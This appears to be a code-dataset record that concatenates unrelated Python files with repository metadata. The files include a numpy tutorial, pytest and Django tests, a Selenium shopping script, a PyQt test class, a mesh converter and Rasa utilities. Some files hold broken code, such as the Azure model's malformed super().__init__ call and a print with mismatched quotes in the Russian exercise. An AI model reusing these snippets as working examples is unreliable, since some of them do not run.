# Python Numpy Tutorial > Numpy > Array indexing
# Numpy offers several ways to index into arrays.
#
# This examples cover:
# Slicing
# Integer array indexing
# Boolean array indexing
#############
# Slicing #
#############
# Similar to Python lists, numpy arrays can be sliced.
# Since arrays may be multidimensional,
# you must specify a slice for each dimension of the array.
import numpy as np
# Create a new array
a = np.array( [[1,2,3,4],[5,6,7,8],[9,10,11,12]])
print(a)
#[[ 1 2 3 4]
# [ 5 6 7 8]
# [ 9 10 11 12]]
b = a[:2,1:3]
print(b)
#[[2 3]
# [6 7]]
print( a[0,1] )
#2
b[0,0] = 77
print( a[0,1] )
#77
print(a)
#[[ 1 77 3 4]
# [ 5 6 7 8]
# [ 9 10 11 12]]
print(b)
#[[77 3]
# [ 6 7]]
# You can also mix integer indexing with slice indexing.
# However, doing so will yield an array of lower rank than the original array.
# Note this is different from the way MATLAB handles array slicing.
# Create a new array # NOTE
a = np.array( [[1,2,3,4],[5,6,7,8],[9,10,11,12]]) # NOTE
print(a) # NOTE
#[[ 1 2 3 4] # NOTE
# [ 5 6 7 8] # NOTE
# [ 9 10 11 12]] # NOTE
row_r1 = a[1,:]
print( row_r1, row_r1.shape )
#[5 6 7 8] (4,)
row_r2 = a[1:2,:] # NOTE
print( row_r2,row_r2.shape ) # NOTE: Review this again
#[[5 6 7 8]] (1, 4) # NOTE
col_r1 = a[:,1] # NOTE
print( col_r1,col_r1.shape ) # NOTE
# [ 2 6 10] (3,) # NOTE
col_r2 = a[:,1:2] # NOTE
print( col_r2,col_r2.shape ) # NOTE: Review this again
#[[ 2] # NOTE
# [ 6] # NOTE
# [10]] (3, 1) # NOTE
############################
# Integer array indexing #
############################
# When you index into numpy arrays using slicing,
# the resulting array view will always be a subarray of the original array.
# In contrast, integer array indexing allows you to construct arbitrary arrays using the data from another array.
a = np.array( [[1,2],[3,4],[5,6]])
print(a)
#[[1 2]
# [3 4]
# [5 6]]
# An example of integer array indexing
print( a[[0,1,2],[0,1,0]] )
# [1 4 5]
# Identical to [a[0,0], a[1,1], a[2,0]]
print( np.array( [ a[0,0], a[1,1], a[2,0] ]) )
# [1 4 5]
# The same element from the source array can be used.
# in this case a[0,1] is repeated.
print( a[[0,0],[1,1]] )
# [2,2]
print( np.array( [a[0,1],a[0,1]]) )
# [2,2]
# One useful trick with integer array indexing is
# selecting or mutating one element from each row of a matrix:
# Create a new array
a = np.array( [[1,2,3], [4,5,6], [7,8,9], [10,11,12]])
print(a)
#[[ 1 2 3]
# [ 4 5 6]
# [ 7 8 9]
# [10 11 12]]
# Create an array of indices
b = np.array( [0,2,0,1] )
print( a[ np.arange(4), b] )
# [ 1 6 7 11]
# [np.arange(4), b] means
# [ [0,1,2,3],[0,2,0,1] ]
# => a[0,0], a[1,2], a[2,0], a[3,1]
# Mutate one element from each row of a using the indices in b
a[np.arange(4),b] += 10
print(a)
#[[11 2 3]
# [ 4 5 16]
# [17 8 9]
# [10 21 12]]
# Add 10 to the indices
############################
# Boolean array indexing #
############################
# Boolean array indexing lets you pick out arbitrary elements of an array.
# Frequently this type of indexing is used to select the elements of an array
# that satisfy some condition.
a = np.array( [[1,2],[3,4],[5,6]] )
print(a)
#[[1 2]
# [3 4]
# [5 6]]
bool_idx = (a > 2)
print( bool_idx )
#[[False False]
# [ True True]
# [ True True]]
print( a[bool_idx] )
#[3 4 5 6]
print( a[ a>2] )
#[3 4 5 6]
print( a[ a>4] )
#[5 6]
| 22.273256 | 114 | 0.567476 |
31cb02371faa1d6684f8d85cec4fbda3959ffd47
| 483 |
py
|
Python
|
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 2. Вариант 50
# Напишите программу, которая будет выводить на экран наиболее понравившееся
# вам высказывание, автором которого является Иларион (Алфеев) .
# Не забудьте о том, что автор должен быть упомянут на отдельной строке.
# Bronnikov I.S.
# 24.05.2016
print("«Нельзя «лезть в душу» человека, ибо душа – это святое святых, и туда можно войти только если вам отворят и пригласят внутрь.""
"\nИларион (Алфеев)")
input("\n\nНажмите Enter для выхода.")
| 40.25 | 135 | 0.728778 |
7345727c4eb218c8c13ef8fbdacaf160a942853e
| 1,975 |
py
|
Python
|
tests/test_silly_sum.py
|
ratschlab/software-m53
|
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
|
[
"MIT"
] | null | null | null |
tests/test_silly_sum.py
|
ratschlab/software-m53
|
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
|
[
"MIT"
] | null | null | null |
tests/test_silly_sum.py
|
ratschlab/software-m53
|
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
|
[
"MIT"
] | null | null | null |
import pytest
import riqc.silly_sum as silly_sum
import pandas as pd
import numpy as np
import os
from click.testing import CliRunner
def path_name():
return os.path.join(os.path.dirname(__file__), 'data', 'numbers.txt')
@pytest.fixture
def fixed_number_array():
""" Returns some numbers from a file """
path = path_name()
with open(path) as f:
return np.array([float(l) for l in f])
expected_file_result = 47.8999
def test_silly_sum_simple():
assert 4 == silly_sum.silly_sum(pd.Series([1, 2, 3]))
def test_silly_sum_raise_exception_on_illegal_step():
with pytest.raises(ValueError):
silly_sum.silly_sum([], -1)
def test_silly_sum_stepsize_one():
# to demonstrate handling random data
np.random.seed(4200) # import to fix seed, otherwise hard to reproduce
data = np.random.uniform(-1.0, 1.0, 10)
assert pytest.approx(sum(data)) == silly_sum.silly_sum(data, 1)
def test_silly_sum_from_file():
assert pytest.approx(expected_file_result) == silly_sum.silly_sum_from_file(
path_name(), 2)
@pytest.mark.parametrize("step,expected", [
(1, 49.9999),
(2, expected_file_result),
(3, 4.3),
(4, 46.9),
(5, 1.0),
(6, 1.0)
])
def test_silly_sum_parametrized(fixed_number_array, step, expected):
# demonstrating parametrized testing
assert pytest.approx(expected) == silly_sum.silly_sum(fixed_number_array,
step)
def test_command_line_interface():
""" Test the CLI. """
runner = CliRunner()
help_result = runner.invoke(silly_sum.main, ['--help'])
assert help_result.exit_code == 0
assert 'Show this message and exit.' in help_result.output
def test_end_to_end():
# Integration test
runner = CliRunner()
result = runner.invoke(silly_sum.main, ['--step', '2', path_name()])
assert pytest.approx(expected_file_result) == float(result.output)
assert result.exit_code == 0
| 26.333333 | 80 | 0.674937 |
6f07b1e6dd52db107d74ed2e6da84f7edff620de
| 167 |
py
|
Python
|
entrypoint.py
|
uosorio/heroku_face
|
7d6465e71dba17a15d8edaef520adb2fcd09d91e
|
[
"Apache-2.0"
] | null | null | null |
entrypoint.py
|
uosorio/heroku_face
|
7d6465e71dba17a15d8edaef520adb2fcd09d91e
|
[
"Apache-2.0"
] | null | null | null |
entrypoint.py
|
uosorio/heroku_face
|
7d6465e71dba17a15d8edaef520adb2fcd09d91e
|
[
"Apache-2.0"
] | null | null | null |
import os
from flask import send_from_directory
from app import create_app
settings_module = os.getenv('APP_SETTINGS_MODULE')
app = create_app(settings_module)
| 12.846154 | 50 | 0.808383 |
48f52ab0eaed81e6b6dd60c19fd3bdff844586ae
| 2,591 |
py
|
Python
|
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
|
jdmartinez36/azure-keyvault-cli-extension
|
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
|
[
"MIT"
] | 2 |
2019-06-12T13:44:34.000Z
|
2020-06-01T13:24:04.000Z
|
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
|
jdmartinez36/azure-keyvault-cli-extension
|
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
|
[
"MIT"
] | 5 |
2018-04-26T01:14:29.000Z
|
2021-01-05T00:45:39.000Z
|
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
|
jdmartinez36/azure-keyvault-cli-extension
|
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
|
[
"MIT"
] | 8 |
2018-04-24T22:52:48.000Z
|
2021-11-16T06:29:28.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .storage_account_item import StorageAccountItem
class DeletedStorageAccountItem(StorageAccountItem):
"""The deleted storage account item containing metadata about the deleted
storage account.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Storage identifier.
:vartype id: str
:ivar resource_id: Storage account resource Id.
:vartype resource_id: str
:ivar attributes: The storage account management attributes.
:vartype attributes: ~azure.keyvault.models.StorageAccountAttributes
:ivar tags: Application specific metadata in the form of key-value pairs.
:vartype tags: dict[str, str]
:param recovery_id: The url of the recovery object, used to identify and
recover the deleted storage account.
:type recovery_id: str
:ivar scheduled_purge_date: The time when the storage account is scheduled
to be purged, in UTC
:vartype scheduled_purge_date: datetime
:ivar deleted_date: The time when the storage account was deleted, in UTC
:vartype deleted_date: datetime
"""
_validation = {
'id': {'readonly': True},
'resource_id': {'readonly': True},
'attributes': {'readonly': True},
'tags': {'readonly': True},
'scheduled_purge_date': {'readonly': True},
'deleted_date': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},
'tags': {'key': 'tags', 'type': '{str}'},
'recovery_id': {'key': 'recoveryId', 'type': 'str'},
'scheduled_purge_date': {'key': 'scheduledPurgeDate', 'type': 'unix-time'},
'deleted_date': {'key': 'deletedDate', 'type': 'unix-time'},
}
def __init__(self, *, recovery_id: str=None, **kwargs) -> None:
super(DeletedStorageAccountItem, self).__init__(, **kwargs)
self.recovery_id = recovery_id
self.scheduled_purge_date = None
self.deleted_date = None
| 40.484375 | 83 | 0.631802 |
d28cadfb615f40b4aa31a886f41c4ad1f9698e9a
| 928 |
py
|
Python
|
sn.py
|
weibk/webauto
|
f494f8043d05739935d1fc22b941bbc9a7ba75b7
|
[
"MIT"
] | null | null | null |
sn.py
|
weibk/webauto
|
f494f8043d05739935d1fc22b941bbc9a7ba75b7
|
[
"MIT"
] | null | null | null |
sn.py
|
weibk/webauto
|
f494f8043d05739935d1fc22b941bbc9a7ba75b7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# encoding='utf-8'
# author:weibk
# @time:2021/10/22 14:28
from selenium import webdriver
from selenium.webdriver.common import keys
driver = webdriver.Chrome()
driver.get('https://www.suning.com/')
driver.maximize_window()
driver.find_element_by_xpath('//*[@id="searchKeywords"]').send_keys('小米10')
driver.find_element_by_xpath('//*[@id="searchKeywords"]').send_keys(
keys.Keys.ENTER)
original = driver.current_window_handle
driver.implicitly_wait(5)
driver.find_elements_by_css_selector('.sellPoint')[3].click()
driver.implicitly_wait(5)
for i in driver.window_handles:
if i != original:
driver.switch_to.window(i)
driver.find_element_by_xpath('//*[@id="addCart"]').click()
driver.implicitly_wait(5)
print(driver.title)
print(driver.window_handles)
driver.switch_to.frame()
driver.find_element_by_xpath('//*[@class="go-cart" and '
'name="cart1_go"]').click()
| 30.933333 | 75 | 0.727371 |
d2f1aaec135bcb8fa182512c8c594a6aab38e0cc
| 1,830 |
py
|
Python
|
ng-003/ex1-003/py_ex1/main.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
ng-003/ex1-003/py_ex1/main.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
ng-003/ex1-003/py_ex1/main.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Model:
h = theta_0+theta_1 * x
x_m - matrix
x - vector
Local min:
http://book.caltech.edu/bookforum/showthread.php?p=10595
convex function
Danger:
В NumPy операции с матрицами очень опасные - никакой защиты.
Numpy:
http://wiki.scipy.org/NumPy_for_Matlab_Users
"""
import numpy
import pylab
import numpy as np
def warm_up_exercise():
return numpy.eye(5)
def load(filename):
tmp = numpy.genfromtxt(filename, delimiter=',')
return tmp
def plot_data(x, y):
pylab.plot(x, y, '+')
pylab.show()
def compute_cost(m_x, y, theta):
h = m_x * theta # (AB)^T = B^T * A^T
m = m_x.shape[0]
j = 1/(2.0 * m) * np.sum(np.square(h - y))
return j
def gradient_descent(m_x, y, theta, alpha, num_iterations):
theta_local = np.copy(theta)
m = m_x.shape[0]
for i in range(num_iterations):
h = (theta_local.T * m_x.T).T
theta_local -= alpha * 1 / m * np.multiply((h - y), m_x).T.sum(axis=1)
return theta_local
def main():
# Похоже сортировка не нужна - или таки нужна?
# J - Это сумма, поэтому скорее всего не важна
#
# Извлекаем два !вектора! входных данных
data = load('mlclass-ex1/ex1data1.txt')
x = np.mat(data[:, :1])
y = np.mat(data[:, 1:2])
# Prepare data
m = len(y)
m_x = numpy.hstack([numpy.ones((m, 1)), x])
# Params - zero point
theta = np.mat(numpy.zeros((1, 2))).T # Превращаем в !вектор
# cost first iteration
j = compute_cost(m_x, y, theta) # just example
# Iteration
num_iterations = 1500
alpha = 0.01
# Find min
theta_opt = gradient_descent(m_x, y, theta, alpha, num_iterations)
# Plot data and estimated line
line = m_x * theta_opt
pylab.plot(x, y, '+', x, line, 'v')
pylab.show()
if __name__ == '__main__':
main()
| 19.468085 | 78 | 0.615301 |
81b20c0a66d5c408d957a27a29ad5039316e66bb
| 3,802 |
py
|
Python
|
watchlist_app/tests/test_watchlist_api.py
|
attachemd/moviedb
|
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
|
[
"MIT"
] | null | null | null |
watchlist_app/tests/test_watchlist_api.py
|
attachemd/moviedb
|
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
|
[
"MIT"
] | null | null | null |
watchlist_app/tests/test_watchlist_api.py
|
attachemd/moviedb
|
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from datetime import datetime
import django
from django.urls import reverse
from django.utils import timezone
from faker import Faker
from rest_framework.test import APIClient
from rest_framework import status
from core.models import WatchListModel
from watchlist_app.api.serializers import WatchListSerializer
from watchlist_app.tests.factories import WatchListFactory, StreamPlatformFactory
MOVIES_URL = reverse('movie_list')
def movie_url_pk(pk):
return reverse('movie_detail', kwargs={'pk': pk})
def sample_stream_platform(user, name='Main course'):
return StreamPlatformFactory()
def valid_watch_list(stream_platform_id):
return {
'title': faker.company(),
'platform': stream_platform_id,
'storyline': faker.sentence(),
'website': faker.url(),
'active': faker.boolean(),
# 'created': datetime.now().strftime("%A, %d. %B %Y %I:%M%p")
# 'created': str(timezone.now())
# 'created': datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%fZ")
# 'created': datetime.now().strftime("%Y-%m-%d %H:%M[:%S[.uuuuuu]][TZ]")
# 'created': datetime.now().strftime("YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]")
}
faker = Faker()
class MoviesApiTests(TestCase):
"""Test the authorized user tags API"""
def setUp(self):
self.client = APIClient()
self.stream_platform = StreamPlatformFactory()
self.valid_watch_list = valid_watch_list(self.stream_platform.id)
self.invalid_watch_list = {
'title': '',
}
def test_retrieve_movies(self):
"""Test retrieving tags"""
WatchListFactory(platform=self.stream_platform)
WatchListFactory(platform=self.stream_platform)
res = self.client.get(MOVIES_URL)
movies = WatchListModel.objects.all()
serializer = WatchListSerializer(movies, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_create_movie_successful(self):
"""Test creating a new tag"""
res = self.client.post(MOVIES_URL, self.valid_watch_list)
print("res: ")
print(res)
# exists = WatchList.objects.filter(
# title=self.valid_watch_list['title'],
# about=self.valid_watch_list['about'],
# website=self.valid_watch_list['website'],
# active=self.valid_watch_list['active'],
# ).exists()
exists = WatchListModel.objects.filter(
**self.valid_watch_list
).exists()
self.assertTrue(exists)
def test_create_movie_invalid(self):
"""Test creating a new tag with invalid payload"""
res = self.client.post(MOVIES_URL, self.invalid_watch_list)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_valid_update_movie(self):
"""
Validated data case
"""
movie = WatchListFactory(platform=self.stream_platform)
response = self.client.put(
movie_url_pk(movie.pk),
data=self.valid_watch_list
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_invalid_update_movie(self):
"""
Invalid data case
"""
movie = WatchListFactory(platform=self.stream_platform)
response = self.client.put(
movie_url_pk(movie.pk),
data=self.invalid_watch_list
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_delete_movie(self):
movie = WatchListFactory(platform=self.stream_platform)
response = self.client.delete(movie_url_pk(movie.pk))
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
| 32.220339 | 82 | 0.658601 |
48402832da134998cb30b07c0cce5f9e6b5f65bd
| 5,628 |
py
|
Python
|
GUI/class_Bolita.py
|
AnuTor/UniNeuroLab
|
5825f440d4663650f038083f3da05229cc5ada4f
|
[
"Apache-2.0"
] | null | null | null |
GUI/class_Bolita.py
|
AnuTor/UniNeuroLab
|
5825f440d4663650f038083f3da05229cc5ada4f
|
[
"Apache-2.0"
] | null | null | null |
GUI/class_Bolita.py
|
AnuTor/UniNeuroLab
|
5825f440d4663650f038083f3da05229cc5ada4f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QApplication, QMainWindow
#from PyQt5.QtCore import Qt
import numpy as np
#import sys
#import time
global n
rango=np.arange(1,26)
n= np.random.permutation(rango)
## Creo una segunda Clase
st = str("border-radius : 15; border : 1px solid black")
#global st
class Bolitas():
""" Aqui crearemos cada una de las bolitas del test
con sus atributos y sus metodos para trabajarlas como objetos"""
def __init__(self, setGeometry , t_Obj = QtWidgets.QPushButton, id = 0, valor = 0, estado = 0, setStyleSheet = st):
#super(Bolitas, self).__init__()
""" Create a new point at the origin """
self.g1 = setGeometry[0] #Coordenada X
self.g2 = setGeometry[1] #Coordenada Y
self.g3 = setGeometry[2] #Anchura
self.g4 = setGeometry[3] #Altura
self.t_Obj= QtWidgets.QPushButton
self.id = id
self.valor = valor # puede tomar valores del 1 al 25
self.estado = estado # puede tener 3 estados Blanca, Verde o Roja
self.setStyleSheet = st
'''
def cambioColor(self):
""" Este metodo hace que la bolita cambie de estado"""
global estado #estado1
global n
global tr1
global tr2
global tr3
global tr4
global tr5
print("El estado de la bolita", "es: ")
print(estado)
estado = estado +1
#numero_estado1=numero_estado1+1
if numero_estado1==n[0]:
print("Color Verde")
self.b1.setStyleSheet("background-color: green; color: white; border-radius : 15; border : 1px solid green")
# Aqui hay que evaluar todas las codiciones relativas de todas las bolitas
if tr2==1:
self.b2.setStyleSheet("border-radius : 15; border : 1px solid black")
tr2=0
if tr3==1:
self.b3.setStyleSheet("border-radius : 15; border : 1px solid black")
tr3=0
if tr4==1:
self.b4.setStyleSheet("border-radius : 15; border : 1px solid black")
tr4=0
if tr5==1:
self.b5.setStyleSheet("border-radius : 15; border : 1px solid black")
tr5=0
elif numero_estado1 != n[0] :
print("Color Rojo")
self.b1.setStyleSheet("background-color: red; color: white; border-radius : 15; border : 1px solid red")
print("El número es mayor al esperado, elija el número siguiente al marcado en verde")
numero_estado1=numero_estado1-1
tr1=1 #Levanto el flag de que se presionó una bolita mayor a la esperada
else:
print("Color Negro")
self.b1.setStyleSheet("border-radius : 15; border : 1px solid black")
def contarIntentos(self):
este metodo cuanta cuantos click se hacen sobre el boton-bolita
return num_intentos
'''
print("Me parece que cree la primer bolita")
#print("Este es n: ", n)
i= 0
numero_estado1 = 0
numero_estado2 = 0
numero_estado3 = 0
numero_estado4 = 0
numero_estado5 = 0
numero_estado6 = 0
numero_estado7 = 0
numero_estado8 = 0
numero_estado9 = 0
numero_estado10 = 0
numero_estado11 = 0
numero_estado12 = 0
numero_estado13 = 0
numero_estado14 = 0
numero_estado15 = 0
numero_estado16 = 0
numero_estado17 = 0
numero_estado18 = 0
numero_estado19 = 0
numero_estado20 = 0
numero_estado21 = 0
numero_estado22 = 0
numero_estado23 = 0
numero_estado24 = 0
numero_estado25 = 0
# Creamos una bolita (25-bolitas) ahora como objeto de la clase Bolitas
b1 = Bolitas([400,400,30,30], QtWidgets.QPushButton, "1" , n[0], 0, st)
b2 = Bolitas([460,480,30,30], QtWidgets.QPushButton, "2" , n[1], 0, st)
b3 = Bolitas([250,450,30,30], QtWidgets.QPushButton, "3" , n[2], 0, st)
b4 = Bolitas([450,370,30,30] , QtWidgets.QPushButton, "4" , n[3], 0, st)
b5 = Bolitas([250,50,30,30], QtWidgets.QPushButton, "5" , n[4], 0, st)
b6 = Bolitas([20,470,30,30], QtWidgets.QPushButton, "6" , n[5], 0, st)
b7 = Bolitas([380,200,30,30], QtWidgets.QPushButton, "7" , n[6], 0, st)
b8 = Bolitas([200,200,30,30] , QtWidgets.QPushButton, "8" , n[7], 0, st)
b9 = Bolitas([250,350,30,30] , QtWidgets.QPushButton, "9" , n[8], 0, st)
b10 = Bolitas([180,280,30,30] , QtWidgets.QPushButton, "10", n[9], 0, st)
b11 = Bolitas([130,420,30,30], QtWidgets.QPushButton, "11", n[10],0, st)
b12 = Bolitas([420,130,30,30] , QtWidgets.QPushButton, "12", n[11],0, st)
b13 = Bolitas([200,90,30,30] , QtWidgets.QPushButton, "13", n[12],0, st)
b14 = Bolitas([330,290,30,30] , QtWidgets.QPushButton, "14", n[13],0, st)
b15 = Bolitas([150,370,30,30] , QtWidgets.QPushButton, "15", n[14],0, st)
b16 = Bolitas([380,80,30,30], QtWidgets.QPushButton, "16", n[15],0, st)
b17 = Bolitas([325,200,30,30], QtWidgets.QPushButton, "17", n[16],0, st)
b18 = Bolitas([270,300,30,30] , QtWidgets.QPushButton, "18", n[17],0, st)
b19 = Bolitas([20,180,30,30] , QtWidgets.QPushButton, "19", n[18],0, st)
b20 = Bolitas([35,320,30,30] , QtWidgets.QPushButton, "20", n[19],0, st)
b21 = Bolitas([90,360,30,30] , QtWidgets.QPushButton, "21", n[20],0, st)
b22 = Bolitas([95,140,30,30] , QtWidgets.QPushButton, "22", n[21],0, st)
b23 = Bolitas([70,220,30,30] , QtWidgets.QPushButton, "23", n[22],0, st)
b24 = Bolitas([180,150,30,30], QtWidgets.QPushButton, "24", n[23],0, st)
b25 = Bolitas([135,80,30,30] , QtWidgets.QPushButton, "25", n[24],0, st)
| 34.109091 | 120 | 0.617093 |
48500526498d8d068cf111ac518826fe54debc38
| 2,850 |
py
|
Python
|
tools/legacy/mw4-erf-converter/convertErf.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 2 |
2020-03-18T18:23:27.000Z
|
2020-08-02T15:59:16.000Z
|
tools/legacy/mw4-erf-converter/convertErf.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 5 |
2019-07-07T16:47:47.000Z
|
2020-08-10T16:20:00.000Z
|
tools/legacy/mw4-erf-converter/convertErf.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 1 |
2020-03-18T18:23:30.000Z
|
2020-03-18T18:23:30.000Z
|
import sys
import json
import glob
import readErf
importFilenames = sys.argv[1:]
# lower half of mech
# hip
# (l/r)uleg (u for upper)
# (l/r)mleg (m for middle)
# (l/r)dleg (d for down)
# (l/r)foot
# (l/r)ftoe (f for front)
# (l/r)btoe (b for back)
def getMaxMinY(items):
mappedItems = list(map(lambda x: x[1]))
minY = min(mappedItems)
maxY = max(mappedItems)
return (maxY, minY)
def getMaxMinX(items):
mappedItems = list(map(lambda x: x[0]))
minX = min(mappedItems)
maxX = max(mappedItems)
return (maxY, minY)
for importFilename in importFilenames:
partName = importFilename.replace(".erf", "").replace(".ERF", "").split("/")[-1]
exportFilename = importFilename.replace(".erf", ".obj").replace(".ERF", ".obj")
try:
print "reading " + importFilename
with open(importFilename, "rb") as input_fd:
# first get the parsed shape datastructures
rawData = input_fd.read()
offset, numLod = readErf.readLod(0, rawData)
offset, numMeshes = readErf.readNumOfMeshes(offset, rawData)
i = 0
meshes = []
while i < numMeshes:
offset, numVerts = readErf.readNumOfVerts(offset, rawData)
offset, verts = readErf.readVerts(offset, rawData, numVerts)
offset, uvVerts = readErf.readUvVerts(offset, rawData)
offset, name = readErf.readTextureName(offset, rawData)
offset, numFaces = readErf.readNumFaces(offset, rawData)
offset, faces = readErf.readFaces(offset, rawData, numFaces)
offset, numPlanePoints = readErf.readNumPlanePoints(offset, rawData)
offset, planePoints = readErf.readPlanePoints(offset, rawData, numPlanePoints)
offset, numNormals = readErf.readNumNormalPoints(offset, rawData)
offset, normals = readErf.readNormalPoints(offset, rawData, numNormals)
meshes.append((name, verts, uvVerts, faces));
i += 1
print "writing " + exportFilename
with open(exportFilename,"w") as shapeFile:
vertIndex = 0
for index, mesh in enumerate(meshes):
name, verts, uvVerts, faces = mesh
shapeFile.write("g " + partName + "-" + str(index) + "\r\n")
for vertex in verts:
shapeFile.write("\tv " + str(vertex[0]) + " " + str(vertex[1]) + " " + str(vertex[2]) + "\r\n")
for face in faces:
shapeFile.write("\tf ")
for value in face:
shapeFile.write(str(value + 1 + vertIndex) + " ")
shapeFile.write("\r\n")
vertIndex += len(verts)
except Exception as e:
print e
| 38.513514 | 115 | 0.568421 |
6f9de8cc9e026d9da1d97f7f0a7b2fd79f1bb7e9
| 51 |
py
|
Python
|
production/pygsl-0.9.5/gsl_dist/__init__.py
|
juhnowski/FishingRod
|
457e7afb5cab424296dff95e1acf10ebf70d32a9
|
[
"MIT"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
production/pygsl-0.9.5/gsl_dist/__init__.py
|
juhnowski/FishingRod
|
457e7afb5cab424296dff95e1acf10ebf70d32a9
|
[
"MIT"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/__init__.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
# Just for declaration
__all__ = ["gsl_Extension"]
| 17 | 27 | 0.745098 |
d200b5abad2f5d2d4884a423bd1145df06bca377
| 763 |
py
|
Python
|
rasa/shared/utils/cli.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | 1 |
2020-10-14T18:09:10.000Z
|
2020-10-14T18:09:10.000Z
|
rasa/shared/utils/cli.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | 187 |
2020-02-25T16:07:06.000Z
|
2022-03-01T13:42:41.000Z
|
rasa/shared/utils/cli.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | null | null | null |
import sys
from typing import Any, Text, NoReturn
import rasa.shared.utils.io
def print_color(*args: Any, color: Text):
print(rasa.shared.utils.io.wrap_with_color(*args, color=color))
def print_success(*args: Any):
print_color(*args, color=rasa.shared.utils.io.bcolors.OKGREEN)
def print_info(*args: Any):
print_color(*args, color=rasa.shared.utils.io.bcolors.OKBLUE)
def print_warning(*args: Any):
print_color(*args, color=rasa.shared.utils.io.bcolors.WARNING)
def print_error(*args: Any):
print_color(*args, color=rasa.shared.utils.io.bcolors.FAIL)
def print_error_and_exit(message: Text, exit_code: int = 1) -> NoReturn:
"""Print error message and exit the application."""
print_error(message)
sys.exit(exit_code)
| 23.84375 | 72 | 0.731324 |
fb50513aa1e6c67b5d034dcff900c7f890e63cd9
| 519 |
py
|
Python
|
examples/lcd.py
|
Elecrow-RD/Raspberry-Pi-Starter-Kit
|
9adad7bfb403a697119bf80bbc2290bc3832750d
|
[
"MIT"
] | 1 |
2020-08-11T23:39:23.000Z
|
2020-08-11T23:39:23.000Z
|
examples/lcd.py
|
Elecrow-RD/Raspberry-Pi-Starter-Kit
|
9adad7bfb403a697119bf80bbc2290bc3832750d
|
[
"MIT"
] | null | null | null |
examples/lcd.py
|
Elecrow-RD/Raspberry-Pi-Starter-Kit
|
9adad7bfb403a697119bf80bbc2290bc3832750d
|
[
"MIT"
] | 1 |
2020-08-05T18:30:45.000Z
|
2020-08-05T18:30:45.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import time
import Adafruit_CharLCD as LCD
# Define LCD column and row size for 16x2 LCD.
lcd_columns = 16
lcd_rows = 2
# Initialize the LCD using the pins
lcd = LCD.Adafruit_CharLCDBackpack(address=0x21)
try:
while True:
# Turn backlight on
lcd.set_backlight(0)
# clean the LCD screen
lcd.clear()
lcd.message('Hello world')
time.sleep(5)
except KeyboardInterrupt:
# Turn the screen off
lcd.clear()
lcd.set_backlight(1)
